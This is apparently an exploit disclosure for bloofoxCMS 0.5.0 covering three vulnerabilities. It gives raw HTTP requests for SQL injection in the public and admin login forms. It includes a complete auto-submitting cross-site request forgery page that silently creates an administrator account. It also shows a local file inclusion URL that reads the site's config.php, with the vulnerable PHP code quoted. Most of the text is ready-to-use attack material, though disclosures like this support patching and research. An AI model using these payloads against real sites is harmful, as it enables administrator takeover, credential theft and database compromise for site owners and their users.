bloofoxCMS version 0.5.0 suffers from cross site request forgery, local file inclusion, and remote SQL injection vulnerabilities.
668beef15d4f8f90dfb10c1735f36d023ec89384dee1488778317af0eb2ea645
bloofoxCMS V0.5.0 - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.bloofox.com/download.21.html
####################################################################
[1] Multiple Sql Injection
==========================
I. http://localhost/bloofox/index.php?login=true
POST /bloofox/index.php?login=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/bloofox/index.php?login=true
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
login=Login&password=IPHOBOS&username=\[SQL INJECTION]
II. http://localhost/bloofox/admin/index.php
POST /bloofox/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/bloofox/admin/
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
action=login&password=IPHOBOS&username=\[SQL INJECTION]
[2] Cross Site Request Forgery
===============================
[Add Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://localhost/admin/index.php?mode=user&action=new">
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="pwdconfirm" value="123456"/>
<input type="hidden" name="3" value="Admin"/>
<input type="hidden" name="blocked" value="0"/>
<input type="hidden" name="deleted" value="0"/>
<input type="hidden" name="status" value="1"/>
<input type="hidden" name="login_page" value="0"/>
<input type="hidden" name="send" value="Add User"/>
</form>
</body>
</html>
[3] Local File Include
=======================
VULNERABILITY
##############
/admin/include/inc_settings_editor.php (line 56-69)
// show file
if(isset($_POST["fileurl"])) {
$fileurl = $_POST["fileurl"];
}
if(isset($_GET["fileurl"])) {
$fileurl = "../".$_GET["fileurl"];
}
if(file_exists($fileurl)) {
$filelength = filesize($fileurl);
$readfile = fopen($fileurl,"r");
$file = fread($readfile,$filelength);
fclose($readfile);
}
#########
EXPLOIT
#########
http://localhost/admin/index.php?mode=settings&page=editor&fileurl=config.php
####################################################################